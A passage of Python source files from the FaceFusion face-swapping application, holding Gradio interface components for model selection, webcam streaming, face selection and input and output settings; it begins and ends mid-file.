face_enhancer_module.MODELS[face_enhancer_model]) if face_enhancer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.face_enhancer_model) return gradio.Dropdown() def update_face_enhancer_blend(face_enhancer_blend : int) -> None: frame_processors_globals.face_enhancer_blend = face_enhancer_blend def update_face_swapper_model(face_swapper_model : FaceSwapperModel) -> gradio.Dropdown: frame_processors_globals.face_swapper_model = face_swapper_model if face_swapper_model == 'blendswap_256': facefusion.globals.face_recognizer_model = 'arcface_blendswap' if face_swapper_model == 'inswapper_128' or face_swapper_model == 'inswapper_128_fp16': facefusion.globals.face_recognizer_model = 'arcface_inswapper' if face_swapper_model == 'simswap_256' or face_swapper_model == 'simswap_512_unofficial': facefusion.globals.face_recognizer_model = 'arcface_simswap' if face_swapper_model == 'uniface_256': facefusion.globals.face_recognizer_model = 'arcface_uniface' face_swapper_module = load_frame_processor_module('face_swapper') face_swapper_module.clear_model_initializer() face_swapper_module.clear_frame_processor() face_swapper_module.set_options('model', face_swapper_module.MODELS[face_swapper_model]) if face_analyser.pre_check() and face_swapper_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.face_swapper_model) return gradio.Dropdown() def update_frame_colorizer_model(frame_colorizer_model : FrameColorizerModel) -> gradio.Dropdown: frame_processors_globals.frame_colorizer_model = frame_colorizer_model frame_colorizer_module = load_frame_processor_module('frame_colorizer') frame_colorizer_module.clear_frame_processor() frame_colorizer_module.set_options('model', frame_colorizer_module.MODELS[frame_colorizer_model]) if frame_colorizer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.frame_colorizer_model) return gradio.Dropdown() def update_frame_colorizer_blend(frame_colorizer_blend : int) -> None: frame_processors_globals.frame_colorizer_blend = frame_colorizer_blend def update_frame_colorizer_size(frame_colorizer_size : str) -> gradio.Dropdown: frame_processors_globals.frame_colorizer_size = frame_colorizer_size return gradio.Dropdown(value = frame_processors_globals.frame_colorizer_size) def update_frame_enhancer_model(frame_enhancer_model : FrameEnhancerModel) -> gradio.Dropdown: frame_processors_globals.frame_enhancer_model = frame_enhancer_model frame_enhancer_module = load_frame_processor_module('frame_enhancer') frame_enhancer_module.clear_frame_processor() frame_enhancer_module.set_options('model', frame_enhancer_module.MODELS[frame_enhancer_model]) if frame_enhancer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.frame_enhancer_model) return gradio.Dropdown() def update_frame_enhancer_blend(frame_enhancer_blend : int) -> None: frame_processors_globals.frame_enhancer_blend = frame_enhancer_blend def update_lip_syncer_model(lip_syncer_model : LipSyncerModel) -> gradio.Dropdown: frame_processors_globals.lip_syncer_model = lip_syncer_model lip_syncer_module = load_frame_processor_module('lip_syncer') lip_syncer_module.clear_frame_processor() lip_syncer_module.set_options('model', lip_syncer_module.MODELS[lip_syncer_model]) if lip_syncer_module.pre_check(): return gradio.Dropdown(value = frame_processors_globals.lip_syncer_model) return gradio.Dropdown() File: facefusion/uis/components/common_options.py from typing import Optional, List import gradio import facefusion.globals from facefusion import wording from facefusion.uis import choices as uis_choices COMMON_OPTIONS_CHECKBOX_GROUP : Optional[gradio.Checkboxgroup] = None def render() -> None: global COMMON_OPTIONS_CHECKBOX_GROUP value = [] if facefusion.globals.keep_temp: value.append('keep-temp') if facefusion.globals.skip_audio: value.append('skip-audio') if facefusion.globals.skip_download: value.append('skip-download') COMMON_OPTIONS_CHECKBOX_GROUP = gradio.Checkboxgroup( label = wording.get('uis.common_options_checkbox_group'), choices = uis_choices.common_options, value = value ) def listen() -> None: COMMON_OPTIONS_CHECKBOX_GROUP.change(update, inputs = COMMON_OPTIONS_CHECKBOX_GROUP) def update(common_options : List[str]) -> None: facefusion.globals.keep_temp = 'keep-temp' in common_options facefusion.globals.skip_audio = 'skip-audio' in common_options facefusion.globals.skip_download = 'skip-download' in common_options File: facefusion/uis/components/trim_frame.py from typing import Any, Dict, Tuple, Optional import gradio import facefusion.globals from facefusion import wording from facefusion.face_store import clear_static_faces from facefusion.vision import count_video_frame_total from facefusion.filesystem import is_video from facefusion.uis.core import get_ui_components, register_ui_component TRIM_FRAME_START_SLIDER : Optional[gradio.Slider] = None TRIM_FRAME_END_SLIDER : Optional[gradio.Slider] = None def render() -> None: global TRIM_FRAME_START_SLIDER global TRIM_FRAME_END_SLIDER trim_frame_start_slider_args : Dict[str, Any] =\ { 'label': wording.get('uis.trim_frame_start_slider'), 'step': 1, 'minimum': 0, 'maximum': 100, 'visible': False } trim_frame_end_slider_args : Dict[str, Any] =\ { 'label': wording.get('uis.trim_frame_end_slider'), 'step': 1, 'minimum': 0, 'maximum': 100, 'visible': False } if is_video(facefusion.globals.target_path): video_frame_total = count_video_frame_total(facefusion.globals.target_path) trim_frame_start_slider_args['value'] = facefusion.globals.trim_frame_start or 0 trim_frame_start_slider_args['maximum'] = video_frame_total trim_frame_start_slider_args['visible'] = True trim_frame_end_slider_args['value'] = facefusion.globals.trim_frame_end or video_frame_total trim_frame_end_slider_args['maximum'] = video_frame_total trim_frame_end_slider_args['visible'] = True with gradio.Row(): TRIM_FRAME_START_SLIDER = gradio.Slider(**trim_frame_start_slider_args) TRIM_FRAME_END_SLIDER = gradio.Slider(**trim_frame_end_slider_args) register_ui_component('trim_frame_start_slider', TRIM_FRAME_START_SLIDER) register_ui_component('trim_frame_end_slider', TRIM_FRAME_END_SLIDER) def listen() -> None: TRIM_FRAME_START_SLIDER.release(update_trim_frame_start, inputs = TRIM_FRAME_START_SLIDER) TRIM_FRAME_END_SLIDER.release(update_trim_frame_end, inputs = TRIM_FRAME_END_SLIDER) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(remote_update, outputs = [ TRIM_FRAME_START_SLIDER, TRIM_FRAME_END_SLIDER ]) def remote_update() -> Tuple[gradio.Slider, gradio.Slider]: if is_video(facefusion.globals.target_path): video_frame_total = count_video_frame_total(facefusion.globals.target_path) facefusion.globals.trim_frame_start = None facefusion.globals.trim_frame_end = None return gradio.Slider(value = 0, maximum = video_frame_total, visible = True), gradio.Slider(value = video_frame_total, maximum = video_frame_total, visible = True) return gradio.Slider(value = None, maximum = None, visible = False), gradio.Slider(value = None, maximum = None, visible = False) def update_trim_frame_start(trim_frame_start : int) -> None: clear_static_faces() facefusion.globals.trim_frame_start = trim_frame_start if trim_frame_start > 0 else None def update_trim_frame_end(trim_frame_end : int) -> None: clear_static_faces() video_frame_total = count_video_frame_total(facefusion.globals.target_path) facefusion.globals.trim_frame_end = trim_frame_end if trim_frame_end < video_frame_total else None File: facefusion/uis/components/__init__.py File: facefusion/uis/components/about.py from typing import Optional import gradio from facefusion import metadata, wording ABOUT_BUTTON : Optional[gradio.HTML] = None DONATE_BUTTON : Optional[gradio.HTML] = None def render() -> None: global ABOUT_BUTTON global DONATE_BUTTON ABOUT_BUTTON = gradio.Button( value = metadata.get('name') + ' ' + metadata.get('version'), variant = 'primary', link = metadata.get('url') ) DONATE_BUTTON = gradio.Button( value = wording.get('uis.donate_button'), link = 'https://donate.facefusion.io', size = 'sm' ) File: facefusion/uis/components/execution_queue_count.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion import wording EXECUTION_QUEUE_COUNT_SLIDER : Optional[gradio.Slider] = None def render() -> None: global EXECUTION_QUEUE_COUNT_SLIDER EXECUTION_QUEUE_COUNT_SLIDER = gradio.Slider( label = wording.get('uis.execution_queue_count_slider'), value = facefusion.globals.execution_queue_count, step = facefusion.choices.execution_queue_count_range[1] - facefusion.choices.execution_queue_count_range[0], minimum = facefusion.choices.execution_queue_count_range[0], maximum = facefusion.choices.execution_queue_count_range[-1] ) def listen() -> None: EXECUTION_QUEUE_COUNT_SLIDER.release(update_execution_queue_count, inputs = EXECUTION_QUEUE_COUNT_SLIDER) def update_execution_queue_count(execution_queue_count : int = 1) -> None: facefusion.globals.execution_queue_count = execution_queue_count File: facefusion/uis/components/webcam.py from typing import Optional, Generator, Deque import os import subprocess import cv2 import gradio from time import sleep from concurrent.futures import ThreadPoolExecutor from collections import deque from tqdm import tqdm import facefusion.globals from facefusion import logger, wording from facefusion.audio import create_empty_audio_frame from facefusion.common_helper import is_windows from facefusion.content_analyser import analyse_stream from facefusion.filesystem import filter_image_paths from facefusion.typing import VisionFrame, Face, Fps from facefusion.face_analyser import get_average_face from facefusion.processors.frame.core import get_frame_processors_modules, load_frame_processor_module from facefusion.ffmpeg import open_ffmpeg from facefusion.vision import normalize_frame_color, read_static_images, unpack_resolution from facefusion.uis.typing import StreamMode, WebcamMode from facefusion.uis.core import get_ui_component, get_ui_components WEBCAM_CAPTURE : Optional[cv2.VideoCapture] = None WEBCAM_IMAGE : Optional[gradio.Image] = None WEBCAM_START_BUTTON : Optional[gradio.Button] = None WEBCAM_STOP_BUTTON : Optional[gradio.Button] = None def get_webcam_capture() -> Optional[cv2.VideoCapture]: global WEBCAM_CAPTURE if WEBCAM_CAPTURE is None: if is_windows(): webcam_capture = cv2.VideoCapture(0, cv2.CAP_DSHOW) else: webcam_capture = cv2.VideoCapture(0) if webcam_capture and webcam_capture.isOpened(): WEBCAM_CAPTURE = webcam_capture return WEBCAM_CAPTURE def clear_webcam_capture() -> None: global WEBCAM_CAPTURE if WEBCAM_CAPTURE: WEBCAM_CAPTURE.release() WEBCAM_CAPTURE = None def render() -> None: global WEBCAM_IMAGE global WEBCAM_START_BUTTON global WEBCAM_STOP_BUTTON WEBCAM_IMAGE = gradio.Image( label = wording.get('uis.webcam_image') ) WEBCAM_START_BUTTON = gradio.Button( value = wording.get('uis.start_button'), variant = 'primary', size = 'sm' ) WEBCAM_STOP_BUTTON = gradio.Button( value = wording.get('uis.stop_button'), size = 'sm' ) def listen() -> None: start_event = None webcam_mode_radio = get_ui_component('webcam_mode_radio') webcam_resolution_dropdown = get_ui_component('webcam_resolution_dropdown') webcam_fps_slider = get_ui_component('webcam_fps_slider') if webcam_mode_radio and webcam_resolution_dropdown and webcam_fps_slider: start_event = WEBCAM_START_BUTTON.click(start, inputs = [ webcam_mode_radio, webcam_resolution_dropdown, webcam_fps_slider ], outputs = WEBCAM_IMAGE) WEBCAM_STOP_BUTTON.click(stop, cancels = start_event) for ui_component in get_ui_components( [ 'frame_processors_checkbox_group', 'face_swapper_model_dropdown', 'face_enhancer_model_dropdown', 'frame_enhancer_model_dropdown', 'lip_syncer_model_dropdown', 'source_image' ]): ui_component.change(update, cancels = start_event) def start(webcam_mode : WebcamMode, webcam_resolution : str, webcam_fps : Fps) -> Generator[VisionFrame, None, None]: facefusion.globals.face_selector_mode = 'one' facefusion.globals.face_analyser_order = 'large-small' source_image_paths = filter_image_paths(facefusion.globals.source_paths) source_frames = read_static_images(source_image_paths) source_face = get_average_face(source_frames) stream = None if webcam_mode in [ 'udp', 'v4l2' ]: stream = open_stream(webcam_mode, webcam_resolution, webcam_fps) #type:ignore[arg-type] webcam_width, webcam_height = unpack_resolution(webcam_resolution) webcam_capture = get_webcam_capture() if webcam_capture and webcam_capture.isOpened(): webcam_capture.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG')) #type:ignore[attr-defined] webcam_capture.set(cv2.CAP_PROP_FRAME_WIDTH, webcam_width) webcam_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, webcam_height) webcam_capture.set(cv2.CAP_PROP_FPS, webcam_fps) for capture_frame in multi_process_capture(source_face, webcam_capture, webcam_fps): if webcam_mode == 'inline': yield normalize_frame_color(capture_frame) else: try: stream.stdin.write(capture_frame.tobytes()) except Exception: clear_webcam_capture() yield None def multi_process_capture(source_face : Face, webcam_capture : cv2.VideoCapture, webcam_fps : Fps) -> Generator[VisionFrame, None, None]: with tqdm(desc = wording.get('processing'), unit = 'frame', ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: with ThreadPoolExecutor(max_workers = facefusion.globals.execution_thread_count) as executor: futures = [] deque_capture_frames : Deque[VisionFrame] = deque() while webcam_capture and webcam_capture.isOpened(): _, capture_frame = webcam_capture.read() if analyse_stream(capture_frame, webcam_fps): return future = executor.submit(process_stream_frame, source_face, capture_frame) futures.append(future) for future_done in [ future for future in futures if future.done() ]: capture_frame = future_done.result() deque_capture_frames.append(capture_frame) futures.remove(future_done) while deque_capture_frames: progress.update() yield deque_capture_frames.popleft() def update() -> None: for frame_processor in facefusion.globals.frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) while not frame_processor_module.post_check(): logger.disable() sleep(0.5) logger.enable() def stop() -> gradio.Image: clear_webcam_capture() return gradio.Image(value = None) def process_stream_frame(source_face : Face, target_vision_frame : VisionFrame) -> VisionFrame: source_audio_frame = create_empty_audio_frame() for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): logger.disable() if frame_processor_module.pre_process('stream'): logger.enable() target_vision_frame = frame_processor_module.process_frame( { 'source_face': source_face, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) return target_vision_frame def open_stream(stream_mode : StreamMode, stream_resolution : str, stream_fps : Fps) -> subprocess.Popen[bytes]: commands = [ '-f', 'rawvideo', '-pix_fmt', 'bgr24', '-s', stream_resolution, '-r', str(stream_fps), '-i', '-'] if stream_mode == 'udp': commands.extend([ '-b:v', '2000k', '-f', 'mpegts', 'udp://localhost:27000?pkt_size=1316' ]) if stream_mode == 'v4l2': try: device_name = os.listdir('/sys/devices/virtual/video4linux')[0] if device_name: commands.extend([ '-f', 'v4l2', '/dev/' + device_name ]) except FileNotFoundError: logger.error(wording.get('stream_not_loaded').format(stream_mode = stream_mode), __name__.upper()) return open_ffmpeg(commands) File: facefusion/uis/components/execution_thread_count.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion import wording EXECUTION_THREAD_COUNT_SLIDER : Optional[gradio.Slider] = None def render() -> None: global EXECUTION_THREAD_COUNT_SLIDER EXECUTION_THREAD_COUNT_SLIDER = gradio.Slider( label = wording.get('uis.execution_thread_count_slider'), value = facefusion.globals.execution_thread_count, step = facefusion.choices.execution_thread_count_range[1] - facefusion.choices.execution_thread_count_range[0], minimum = facefusion.choices.execution_thread_count_range[0], maximum = facefusion.choices.execution_thread_count_range[-1] ) def listen() -> None: EXECUTION_THREAD_COUNT_SLIDER.release(update_execution_thread_count, inputs = EXECUTION_THREAD_COUNT_SLIDER) def update_execution_thread_count(execution_thread_count : int = 1) -> None: facefusion.globals.execution_thread_count = execution_thread_count File: facefusion/uis/components/face_selector.py from typing import List, Optional, Tuple, Any, Dict import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.face_store import clear_static_faces, clear_reference_faces from facefusion.vision import get_video_frame, read_static_image, normalize_frame_color from facefusion.filesystem import is_image, is_video from facefusion.face_analyser import get_many_faces from facefusion.typing import VisionFrame, FaceSelectorMode from facefusion.uis.core import get_ui_component, get_ui_components, register_ui_component FACE_SELECTOR_MODE_DROPDOWN : Optional[gradio.Dropdown] = None REFERENCE_FACE_POSITION_GALLERY : Optional[gradio.Gallery] = None REFERENCE_FACE_DISTANCE_SLIDER : Optional[gradio.Slider] = None def render() -> None: global FACE_SELECTOR_MODE_DROPDOWN global REFERENCE_FACE_POSITION_GALLERY global REFERENCE_FACE_DISTANCE_SLIDER reference_face_gallery_args : Dict[str, Any] =\ { 'label': wording.get('uis.reference_face_gallery'), 'object_fit': 'cover', 'columns': 8, 'allow_preview': False, 'visible': 'reference' in facefusion.globals.face_selector_mode } if is_image(facefusion.globals.target_path): reference_frame = read_static_image(facefusion.globals.target_path) reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) if is_video(facefusion.globals.target_path): reference_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) FACE_SELECTOR_MODE_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_selector_mode_dropdown'), choices = facefusion.choices.face_selector_modes, value = facefusion.globals.face_selector_mode ) REFERENCE_FACE_POSITION_GALLERY = gradio.Gallery(**reference_face_gallery_args) REFERENCE_FACE_DISTANCE_SLIDER = gradio.Slider( label = wording.get('uis.reference_face_distance_slider'), value = facefusion.globals.reference_face_distance, step = facefusion.choices.reference_face_distance_range[1] - facefusion.choices.reference_face_distance_range[0], minimum = facefusion.choices.reference_face_distance_range[0], maximum = facefusion.choices.reference_face_distance_range[-1], visible = 'reference' in facefusion.globals.face_selector_mode ) register_ui_component('face_selector_mode_dropdown', FACE_SELECTOR_MODE_DROPDOWN) register_ui_component('reference_face_position_gallery', REFERENCE_FACE_POSITION_GALLERY) register_ui_component('reference_face_distance_slider', REFERENCE_FACE_DISTANCE_SLIDER) def listen() -> None: FACE_SELECTOR_MODE_DROPDOWN.change(update_face_selector_mode, inputs = FACE_SELECTOR_MODE_DROPDOWN, outputs = [ REFERENCE_FACE_POSITION_GALLERY, REFERENCE_FACE_DISTANCE_SLIDER ]) REFERENCE_FACE_POSITION_GALLERY.select(clear_and_update_reference_face_position) REFERENCE_FACE_DISTANCE_SLIDER.release(update_reference_face_distance, inputs = REFERENCE_FACE_DISTANCE_SLIDER) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(update_reference_face_position) getattr(ui_component, method)(update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) for ui_component in get_ui_components( [ 'face_analyser_order_dropdown', 'face_analyser_age_dropdown', 'face_analyser_gender_dropdown' ]): ui_component.change(update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) for ui_component in get_ui_components( [ 'face_detector_model_dropdown', 'face_detector_size_dropdown' ]): ui_component.change(clear_and_update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) for ui_component in get_ui_components( [ 'face_detector_score_slider', 'face_landmarker_score_slider' ]): ui_component.release(clear_and_update_reference_position_gallery, outputs=REFERENCE_FACE_POSITION_GALLERY) preview_frame_slider = get_ui_component('preview_frame_slider') if preview_frame_slider: preview_frame_slider.change(update_reference_frame_number, inputs = preview_frame_slider) preview_frame_slider.release(update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) def update_face_selector_mode(face_selector_mode : FaceSelectorMode) -> Tuple[gradio.Gallery, gradio.Slider]: if face_selector_mode == 'many': facefusion.globals.face_selector_mode = face_selector_mode return gradio.Gallery(visible = False), gradio.Slider(visible = False) if face_selector_mode == 'one': facefusion.globals.face_selector_mode = face_selector_mode return gradio.Gallery(visible = False), gradio.Slider(visible = False) if face_selector_mode == 'reference': facefusion.globals.face_selector_mode = face_selector_mode return gradio.Gallery(visible = True), gradio.Slider(visible = True) def clear_and_update_reference_face_position(event : gradio.SelectData) -> gradio.Gallery: clear_reference_faces() clear_static_faces() update_reference_face_position(event.index) return update_reference_position_gallery() def update_reference_face_position(reference_face_position : int = 0) -> None: facefusion.globals.reference_face_position = reference_face_position def update_reference_face_distance(reference_face_distance : float) -> None: facefusion.globals.reference_face_distance = reference_face_distance def update_reference_frame_number(reference_frame_number : int) -> None: facefusion.globals.reference_frame_number = reference_frame_number def clear_and_update_reference_position_gallery() -> gradio.Gallery: clear_reference_faces() clear_static_faces() return update_reference_position_gallery() def update_reference_position_gallery() -> gradio.Gallery: gallery_vision_frames = [] if is_image(facefusion.globals.target_path): temp_vision_frame = read_static_image(facefusion.globals.target_path) gallery_vision_frames = extract_gallery_frames(temp_vision_frame) if is_video(facefusion.globals.target_path): temp_vision_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) gallery_vision_frames = extract_gallery_frames(temp_vision_frame) if gallery_vision_frames: return gradio.Gallery(value = gallery_vision_frames) return gradio.Gallery(value = None) def extract_gallery_frames(temp_vision_frame : VisionFrame) -> List[VisionFrame]: gallery_vision_frames = [] faces = get_many_faces(temp_vision_frame) for face in faces: start_x, start_y, end_x, end_y = map(int, face.bounding_box) padding_x = int((end_x - start_x) * 0.25) padding_y = int((end_y - start_y) * 0.25) start_x = max(0, start_x - padding_x) start_y = max(0, start_y - padding_y) end_x = max(0, end_x + padding_x) end_y = max(0, end_y + padding_y) crop_vision_frame = temp_vision_frame[start_y:end_y, start_x:end_x] crop_vision_frame = normalize_frame_color(crop_vision_frame) gallery_vision_frames.append(crop_vision_frame) return gallery_vision_frames File: facefusion/uis/components/target.py from typing import Tuple, Optional import gradio import facefusion.globals from facefusion import wording from facefusion.face_store import clear_static_faces, clear_reference_faces from facefusion.uis.typing import File from facefusion.filesystem import get_file_size, is_image, is_video from facefusion.uis.core import register_ui_component from facefusion.vision import get_video_frame, normalize_frame_color FILE_SIZE_LIMIT = 512 * 1024 * 1024 TARGET_FILE : Optional[gradio.File] = None TARGET_IMAGE : Optional[gradio.Image] = None TARGET_VIDEO : Optional[gradio.Video] = None def render() -> None: global TARGET_FILE global TARGET_IMAGE global TARGET_VIDEO is_target_image = is_image(facefusion.globals.target_path) is_target_video = is_video(facefusion.globals.target_path) TARGET_FILE = gradio.File( label = wording.get('uis.target_file'), file_count = 'single', file_types = [ '.png', '.jpg', '.webp', '.webm', '.mp4' ], value = facefusion.globals.target_path if is_target_image or is_target_video else None ) target_image_args =\ { 'show_label': False, 'visible': False } target_video_args =\ { 'show_label': False, 'visible': False } if is_target_image: target_image_args['value'] = TARGET_FILE.value['name'] target_image_args['visible'] = True if is_target_video: if get_file_size(facefusion.globals.target_path) > FILE_SIZE_LIMIT: preview_vision_frame = normalize_frame_color(get_video_frame(facefusion.globals.target_path)) target_image_args['value'] = preview_vision_frame target_image_args['visible'] = True else: target_video_args['value'] = TARGET_FILE.value['name'] target_video_args['visible'] = True TARGET_IMAGE = gradio.Image(**target_image_args) TARGET_VIDEO = gradio.Video(**target_video_args) register_ui_component('target_image', TARGET_IMAGE) register_ui_component('target_video', TARGET_VIDEO) def listen() -> None: TARGET_FILE.change(update, inputs = TARGET_FILE, outputs = [ TARGET_IMAGE, TARGET_VIDEO ]) def update(file : File) -> Tuple[gradio.Image, gradio.Video]: clear_reference_faces() clear_static_faces() if file and is_image(file.name): facefusion.globals.target_path = file.name return gradio.Image(value = file.name, visible = True), gradio.Video(value = None, visible = False) if file and is_video(file.name): facefusion.globals.target_path = file.name if get_file_size(file.name) > FILE_SIZE_LIMIT: preview_vision_frame = normalize_frame_color(get_video_frame(file.name)) return gradio.Image(value = preview_vision_frame, visible = True), gradio.Video(value = None, visible = False) return gradio.Image(value = None, visible = False), gradio.Video(value = file.name, visible = True) facefusion.globals.target_path = None return gradio.Image(value = None, visible = False), gradio.Video(value = None, visible = False) File: facefusion/uis/components/temp_frame.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.typing import TempFrameFormat from facefusion.filesystem import is_video from facefusion.uis.core import get_ui_component TEMP_FRAME_FORMAT_DROPDOWN : Optional[gradio.Dropdown] = None def render() -> None: global TEMP_FRAME_FORMAT_DROPDOWN TEMP_FRAME_FORMAT_DROPDOWN = gradio.Dropdown( label = wording.get('uis.temp_frame_format_dropdown'), choices = facefusion.choices.temp_frame_formats, value = facefusion.globals.temp_frame_format, visible = is_video(facefusion.globals.target_path) ) def listen() -> None: TEMP_FRAME_FORMAT_DROPDOWN.change(update_temp_frame_format, inputs = TEMP_FRAME_FORMAT_DROPDOWN) target_video = get_ui_component('target_video') if target_video: for method in [ 'upload', 'change', 'clear' ]: getattr(target_video, method)(remote_update, outputs = TEMP_FRAME_FORMAT_DROPDOWN) def remote_update() -> gradio.Dropdown: if is_video(facefusion.globals.target_path): return gradio.Dropdown(visible = True) return gradio.Dropdown(visible = False) def update_temp_frame_format(temp_frame_format : TempFrameFormat) -> None: facefusion.globals.temp_frame_format = temp_frame_format File: facefusion/uis/components/benchmark_options.py from typing import Optional import gradio from facefusion import wording from facefusion.uis.core import register_ui_component from facefusion.uis.components.benchmark import BENCHMARKS BENCHMARK_RUNS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None BENCHMARK_CYCLES_SLIDER : Optional[gradio.Button] = None def render() -> None: global BENCHMARK_RUNS_CHECKBOX_GROUP global BENCHMARK_CYCLES_SLIDER BENCHMARK_RUNS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.benchmark_runs_checkbox_group'), value = list(BENCHMARKS.keys()), choices = list(BENCHMARKS.keys()) ) BENCHMARK_CYCLES_SLIDER = gradio.Slider( label = wording.get('uis.benchmark_cycles_slider'), value = 5, step = 1, minimum = 1, maximum = 10 ) register_ui_component('benchmark_runs_checkbox_group', BENCHMARK_RUNS_CHECKBOX_GROUP) register_ui_component('benchmark_cycles_slider', BENCHMARK_CYCLES_SLIDER) File: facefusion/uis/components/source.py from typing import Optional, List, Tuple import gradio import facefusion.globals from facefusion import wording from facefusion.uis.typing import File from facefusion.common_helper import get_first from facefusion.filesystem import has_audio, has_image, filter_audio_paths, filter_image_paths from facefusion.uis.core import register_ui_component SOURCE_FILE : Optional[gradio.File] = None SOURCE_AUDIO : Optional[gradio.Audio] = None SOURCE_IMAGE : Optional[gradio.Image] = None def render() -> None: global SOURCE_FILE global SOURCE_AUDIO global SOURCE_IMAGE has_source_audio = has_audio(facefusion.globals.source_paths) has_source_image = has_image(facefusion.globals.source_paths) SOURCE_FILE = gradio.File( file_count = 'multiple', file_types = [ '.mp3', '.wav', '.png', '.jpg', '.webp' ], label = wording.get('uis.source_file'), value = facefusion.globals.source_paths if has_source_audio or has_source_image else None ) source_file_names = [ source_file_value['name'] for source_file_value in SOURCE_FILE.value ] if SOURCE_FILE.value else None source_audio_path = get_first(filter_audio_paths(source_file_names)) source_image_path = get_first(filter_image_paths(source_file_names)) SOURCE_AUDIO = gradio.Audio( value = source_audio_path if has_source_audio else None, visible = has_source_audio, show_label = False ) SOURCE_IMAGE = gradio.Image( value = source_image_path if has_source_image else None, visible = has_source_image, show_label = False ) register_ui_component('source_audio', SOURCE_AUDIO) register_ui_component('source_image', SOURCE_IMAGE) def listen() -> None: SOURCE_FILE.change(update, inputs = SOURCE_FILE, outputs = [ SOURCE_AUDIO, SOURCE_IMAGE ]) def update(files : List[File]) -> Tuple[gradio.Audio, gradio.Image]: file_names = [ file.name for file in files ] if files else None has_source_audio = has_audio(file_names) has_source_image = has_image(file_names) if has_source_audio or has_source_image: source_audio_path = get_first(filter_audio_paths(file_names)) source_image_path = get_first(filter_image_paths(file_names)) facefusion.globals.source_paths = file_names return gradio.Audio(value = source_audio_path, visible = has_source_audio), gradio.Image(value = source_image_path, visible = has_source_image) facefusion.globals.source_paths = None return gradio.Audio(value = None, visible = False), gradio.Image(value = None, visible = False) File: facefusion/uis/components/output_options.py from typing import Optional, Tuple import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.typing import OutputVideoEncoder, OutputVideoPreset, Fps from facefusion.filesystem import is_image, is_video from facefusion.uis.core import get_ui_components, register_ui_component from facefusion.vision import detect_image_resolution, create_image_resolutions, detect_video_fps, detect_video_resolution, create_video_resolutions, pack_resolution OUTPUT_PATH_TEXTBOX : Optional[gradio.Textbox] = None OUTPUT_IMAGE_QUALITY_SLIDER : Optional[gradio.Slider] = None OUTPUT_IMAGE_RESOLUTION_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_ENCODER_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_PRESET_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_RESOLUTION_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_QUALITY_SLIDER : Optional[gradio.Slider] = None OUTPUT_VIDEO_FPS_SLIDER : Optional[gradio.Slider] = None def render() -> None: global OUTPUT_PATH_TEXTBOX global OUTPUT_IMAGE_QUALITY_SLIDER global OUTPUT_IMAGE_RESOLUTION_DROPDOWN global OUTPUT_VIDEO_ENCODER_DROPDOWN global OUTPUT_VIDEO_PRESET_DROPDOWN global OUTPUT_VIDEO_RESOLUTION_DROPDOWN global OUTPUT_VIDEO_QUALITY_SLIDER global OUTPUT_VIDEO_FPS_SLIDER output_image_resolutions = [] output_video_resolutions = [] if is_image(facefusion.globals.target_path): output_image_resolution = detect_image_resolution(facefusion.globals.target_path) output_image_resolutions = create_image_resolutions(output_image_resolution) if is_video(facefusion.globals.target_path): output_video_resolution = detect_video_resolution(facefusion.globals.target_path) output_video_resolutions = create_video_resolutions(output_video_resolution) facefusion.globals.output_path = facefusion.globals.output_path or '.' OUTPUT_PATH_TEXTBOX = gradio.Textbox( label = wording.get('uis.output_path_textbox'), value = facefusion.globals.output_path, max_lines = 1 ) OUTPUT_IMAGE_QUALITY_SLIDER = gradio.Slider( label = wording.get('uis.output_image_quality_slider'), value = facefusion.globals.output_image_quality, step = facefusion.choices.output_image_quality_range[1] - facefusion.choices.output_image_quality_range[0], minimum = facefusion.choices.output_image_quality_range[0], maximum = facefusion.choices.output_image_quality_range[-1], visible = is_image(facefusion.globals.target_path) ) OUTPUT_IMAGE_RESOLUTION_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_image_resolution_dropdown'), choices = output_image_resolutions, value = facefusion.globals.output_image_resolution, visible = is_image(facefusion.globals.target_path) ) OUTPUT_VIDEO_ENCODER_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_video_encoder_dropdown'), choices = facefusion.choices.output_video_encoders, value = facefusion.globals.output_video_encoder, visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_PRESET_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_video_preset_dropdown'), choices = facefusion.choices.output_video_presets, value = facefusion.globals.output_video_preset, visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_QUALITY_SLIDER = gradio.Slider( label = wording.get('uis.output_video_quality_slider'), value = facefusion.globals.output_video_quality, step = facefusion.choices.output_video_quality_range[1] - 